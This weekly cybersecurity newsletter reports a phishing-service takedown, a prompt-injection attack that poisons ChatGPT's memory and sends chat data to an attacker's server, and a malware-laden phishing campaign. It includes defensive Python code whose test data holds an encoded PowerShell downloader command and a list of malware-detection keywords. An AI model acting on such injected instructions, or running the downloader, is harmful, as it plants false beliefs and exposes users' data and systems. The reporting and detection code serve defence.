Europol nets major phishing operation targeting phone credentials

Sep 27 2024



Welcome to Gone Phishing, your weekly cybersecurity newsletter that’s rolling like cyber thunder ⚡

Patch of the Week! 🩹

First things first, folks. Our weekly segment goes by many names. Patch of the Week, Tweak of the Week. Okay, that’s it… 😳

Congrats to Google, the cybercriminals are no match… for your patch! 🩹

Check out this freshly hatched patch 🐣

E.T. phone Chrome 👽

🚨 New Chrome Features Boost Data Control & Security! 🔒

Google is rolling out new features in Chrome to give users better control over their data and enhance protection against online threats.

The updated Safety Check now runs automatically, revoking site permissions and flagging suspicious notifications in real time. It also warns users about risky Chrome extensions and compromised passwords stored in Google Password Manager. 📱💻

Users can now easily unsubscribe from unwanted notifications on Android and Pixel devices, and grant one-time permissions for camera and mic access, improving privacy management. Stay safe and in control with the latest Chrome update! 🚀🔐

Now, on to this week’s hottest cybersecurity news stories: 

  • 👮 Europol nets major phishing operation targeting phone credentials 📱

  • 👨🏻‍💻 Hackers manipulate your OpenAI history to implant fake memories 🧠

  • 🚢 Transportation companies targeted with Lumma Stealer and NetSupport 🎯

It’s been PhaaSed out ❌❌❌ No catch and release either 🎣


🚨 Takedown of International Criminal Network Behind Phishing Scheme 🛡️

Law enforcement authorities have successfully dismantled an international criminal network responsible for a phishing-as-a-service (PhaaS) platform known as iServer, which has targeted over 483,000 victims globally. Countries most affected include Chile (77,000), Colombia (70,000), and Ecuador (42,000), among others.

The takedown, called Operation Kaerb, was a joint effort between multiple countries, including Spain, Argentina, Chile, Colombia, and Peru. The operation, which ran from September 10 to 17, led to the arrest of an Argentinian national believed to be the mastermind behind iServer since 2018.

In total, 17 arrests were made, with 28 searches conducted, and over 921 items—including electronic devices, weapons, and mobile phones—were seized. Notably, 1.2 million phones are estimated to have been unlocked by the criminal network to date.

🛒 Phishing-as-a-Service (PhaaS) Platform

iServer was an automated phishing platform specifically designed to harvest credentials to unlock stolen or lost phones, setting it apart from typical phishing operations. The platform offered a web interface that allowed criminals, referred to as "unlockers," to retrieve passwords and user credentials from cloud-based platforms. These credentials were then used to bypass Lost Mode and unlink devices from their rightful owners.

🔗 Phishing Tactics

The attackers sent SMS messages to phone theft victims, tricking them into clicking links that redirected them to phishing landing pages. Victims were asked to enter credentials, device passcodes, and two-factor authentication (2FA) codes, which were then abused to gain full access to the stolen devices.

iServer automated the creation of phishing pages that mimicked popular cloud-based mobile platforms, ensuring its effectiveness as a tool for cybercriminals. This PhaaS platform enabled even low-skilled criminals to participate in these illegal activities.

🙌 Criminal Network Disrupted

In total, 51 suspects have been arrested in connection with Ghost, with notable operations targeting criminals in Australia, Ireland, and Italy. This global crackdown on cybercrime demonstrates how law enforcement agencies are increasingly focused on dismantling organised crime groups that exploit sophisticated technology to commit fraud, theft, and other illegal activities.

The takedown of iServer is another victory in the ongoing battle against cybercriminal networks that use phishing and other methods to unlock stolen devices and compromise sensitive data.

🥡 Takeaway

This high-profile case serves as a reminder of the importance of protecting your devices and accounts from phishing attempts and fraudulent messages. It also underscores the growing threat posed by phishing-as-a-service platforms that empower even less technically skilled criminals to carry out wide-reaching cyberattacks.

Want SOC 2 compliance without the Security Theater?

Question 🤔 does your SOC 2 program feel like Security Theater? Just checking pointless boxes, not actually building security?

In an industry filled with security theater vendors, Oneleet is the only security-first compliance platform that provides an “all in one” solution for SOC 2.

We’ll build you a real-world Security Program, perform the Penetration Test, integrate with a 3rd Party Auditor, and provide the Compliance Software … all within one platform.

Schedule a demo for pricing

Memories, in the corner of AI 🎶🥺💀

🚨 Researcher Exploits ChatGPT Vulnerability to Hijack Long-Term Memory 🛡️

A security researcher named Johann Rehberger recently uncovered a vulnerability in ChatGPT's long-term memory feature, which could allow malicious actors to store false information or inject harmful instructions into the system. Initially reported to OpenAI in May, the issue was labelled as a "safety issue" rather than a security flaw, leading Rehberger to develop a proof-of-concept (PoC) exploit that further demonstrated the potential damage.

📄 ChatGPT's Long-Term Memory Feature

Introduced by OpenAI in February 2024, the long-term memory feature stores details from prior interactions, so ChatGPT can retain context about a user’s preferences, beliefs, or personal details for future use. This enables the AI to have more personalised conversations, but it also introduced vulnerabilities.

🚩 Exploit via Prompt Injection

Rehberger discovered that prompt injections—where malicious instructions are embedded in untrusted content such as emails, websites, or documents—could manipulate ChatGPT's memory, leading it to store and recall false information. He demonstrated how ChatGPT could be tricked into believing a user was "102 years old," lived in a fictional world like the Matrix, or subscribed to beliefs like the Earth being flat. The AI would then use this manipulated information to guide future conversations, potentially over time leading to malicious outcomes.

🔗 Proof-of-Concept: Exfiltrating User Data

In a more advanced demonstration, Rehberger crafted a PoC in which all user input and ChatGPT output could be exfiltrated to an external server simply by having ChatGPT interact with a malicious link. The attack exploited a flaw in ChatGPT’s macOS app, making it possible to send all input and output to an attacker’s server through a malicious image loaded from that link.

🔨 OpenAI's Response: Partial Fix

OpenAI responded to Rehberger's findings with a partial fix that prevents memory from being abused as a vector for exfiltration. However, prompt injections can still cause ChatGPT’s memory tool to store false or malicious data, even though this no longer leads to data leaks.

⚠️ Ongoing Risks & Precautions

LLM users are advised to be cautious and monitor for signs of new memory additions, especially after interacting with potentially untrusted content. Regularly reviewing stored memories for any unusual or unauthorised entries is crucial to prevent this form of attack. OpenAI provides specific guidance on managing stored memories to minimise risks.
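To show what the memory-poisoning risk above and the "review new memories" advice look like in code, here is an added illustration (not OpenAI's code, and not the researcher's PoC): a toy memory store that records which source was active when each memory was written, quarantines writes made while untrusted content is being read, and offers an audit of everything added after a checkpoint. The source labels ("user", "web_page") and the memory texts are constructed for the example.

```python
"""Provenance-tagged memory store (added illustration, not OpenAI's code):
writes made while untrusted content is being read are quarantined for review."""
from collections import namedtuple
from contextlib import contextmanager
from dataclasses import dataclass, field

USER = "user"  # the only source allowed to persist memories
Memory = namedtuple("Memory", "seq text source")

@dataclass
class MemoryStore:
    memories: list = field(default_factory=list)
    quarantine: list = field(default_factory=list)
    source: str = USER  # what is driving the conversation right now
    seq: int = 0

    @contextmanager
    def processing(self, source):
        # Mark that the assistant is now reading untrusted content from `source`
        # (assumed labels such as "web_page", "email", "document").
        prev, self.source = self.source, source
        try:
            yield
        finally:
            self.source = prev

    def remember(self, text):
        # Memory-tool write: persisted only if the user is the active source.
        self.seq += 1
        m = Memory(self.seq, text, self.source)
        if self.source != USER:
            self.quarantine.append(m)  # held for the user's review
            return False
        self.memories.append(m)
        return True

    def added_since(self, seq):
        # Audit: everything written after checkpoint `seq`, stored or held.
        return [m for m in self.memories + self.quarantine if m.seq > seq]

def demo():
    store = MemoryStore()
    store.remember("User prefers metric units")
    mark = store.seq
    # Constructed injected instruction, as if hidden in a page the user opened.
    with store.processing("web_page"):
        store.remember("User is 102 years old and lives in the Matrix")
    return store, mark
```

The audit (`added_since`) is the programmatic form of the advice to review memories added after interacting with untrusted content; the quarantine is the stricter mitigation of not persisting them automatically at all.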

The vulnerability reveals the evolving security challenges associated with AI-driven tools that are designed to enhance personalised user experiences but may open doors for potential exploitation.

🥡 Takeaway

This incident highlights the importance of robust security measures for AI systems like ChatGPT, especially as advanced features like long-term memory become more widely adopted. The case also underscores how prompt injections can introduce persistent threats, making it vital for AI developers and users alike to maintain vigilance against potential vulnerabilities in such emerging technologies.

No problem, I’ll just give the NetSupport desk a ring 💀💀💀

🚨 New Phishing Campaign Targets North American Transportation Companies 🛡️

Transportation and logistics companies in North America are the focus of a phishing campaign that seeks to distribute a variety of malicious software, including information stealers and Remote Access Trojans (RATs).

🔐 Phishing Strategy

According to Proofpoint, the attackers use compromised legitimate email accounts from transportation and shipping companies to inject malicious content into ongoing email conversations. So far, 15 breached email accounts have been identified as being part of this campaign. The method by which these accounts were initially compromised is still unknown, and the identities of the attackers remain unclear.

💻 Delivered Malware

Between May and July 2024, the primary malware distributed included Lumma Stealer, StealC, and NetSupport. However, by August 2024, the attackers modified their tactics. They began using new infrastructure, updated delivery techniques, and included additional malware such as DanaBot and Arechclient2.

📝 Attack Vectors

The phishing emails typically contain attachments like internet shortcut (.URL) files or Google Drive URLs. When these files are launched, they use Server Message Block (SMB) to retrieve the malware payload from a remote server. Additionally, a technique known as ClickFix was used to trick victims into running Base64-encoded PowerShell scripts, initiating the malware infection.
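The two delivery mechanisms described above (.URL shortcuts pointing at a remote SMB share, and Base64-encoded PowerShell run via ClickFix) are both visible in ordinary endpoint telemetry. The following is an added detection example written for this newsletter, not code from Proofpoint or from the campaign: it runs over a few constructed log events (the log format, hostnames and IP addresses are assumptions), flags internet shortcuts whose target is a UNC path, and decodes `-EncodedCommand` PowerShell to look for downloader keywords.

```python
"""Detection over constructed endpoint logs (added example, not Proofpoint's
code): flags .URL files with a remote SMB/UNC target and decodes Base64
(UTF-16LE) PowerShell command lines of the kind ClickFix lures produce."""
import base64
import re

# Constructed sample telemetry: (event_type, payload). Addresses are placeholders.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')".encode("utf-16-le")
).decode()
SAMPLE_EVENTS = [
    ("file_content", "[InternetShortcut]\r\nURL=file://\\\\198.51.100.7\\share\\invoice.exe"),
    ("file_content", "[InternetShortcut]\r\nURL=https://example.com/tracking"),
    ("process", "powershell.exe -w hidden -enc " + ENCODED),
    ("process", "powershell.exe -Command Get-Date"),
]

# URL= line whose target is \\host\... or file://\\host\... (not a local file:///C:/ path).
UNC_TARGET = re.compile(r"^URL=(?:file:)?[/\\]{2,}([^/\\\s:]+)[/\\]", re.I | re.M)
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
SUSPICIOUS_PS = ("downloadstring", "iex", "invoke-expression", "frombase64string")

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent/undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyse(event_type, payload):
    """Return the list of findings for one event (empty when nothing is flagged)."""
    findings = []
    if event_type == "file_content" and "[InternetShortcut]" in payload:
        if UNC_TARGET.search(payload):
            findings.append("shortcut_unc_target")
    if event_type == "process" and "powershell" in payload.lower():
        script = decode_encoded_command(payload)
        if script is not None:
            findings.append("encoded_powershell")
            if any(k in script.lower() for k in SUSPICIOUS_PS):
                findings.append("encoded_powershell_downloader")
    return findings

def scan(events):
    # Map event index -> findings, keeping only events that produced any.
    return {i: f for i, (t, p) in enumerate(events) if (f := analyse(t, p))}
```

Decoding the encoded command before matching matters: the Base64 text itself reveals nothing, so a rule that only looks for `-enc` will fire on plenty of legitimate administration scripts.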

🛑 Targeted Companies & Tactics

The campaign has targeted companies using specific fleet management software, such as Samsara, AMB Logistic, and Astra TMS, indicating that the attackers conduct research on their targets before launching their phishing campaigns. The use of such specific lures suggests that these threat actors may be focused on stealing sensitive data or exploiting vulnerabilities related to logistics and transportation operations.

🛠️ Broader Malware Landscape

This attack comes as new strains of information stealers emerge in the wild, including Angry Stealer, BLX Stealer, and CryptBot-related malware like Yet Another Silly Stealer (YASS). Additionally, a new version of the RomCom RAT, codenamed SnipBot, has been observed in other phishing attacks. This malware allows attackers to execute commands on victim systems, upload/download files, and create archives using 7-Zip.

Though RomCom has been associated with ransomware attacks, recent campaigns suggest a shift toward espionage, particularly with the involvement of the group known as Tropical Scorpius (Void Rabisu).

🥡 Key Takeaway

This phishing campaign is a reminder of the importance of cybersecurity vigilance, particularly in industries like transportation and logistics where compromised systems can lead to significant operational disruptions. As attackers evolve their tactics, businesses must continue to update their security measures and educate employees on phishing risks.

🗞️ Extra, Extra! Read all about it! 🗞️

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

  • 💵Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think.

So long and thanks for reading all the phish!

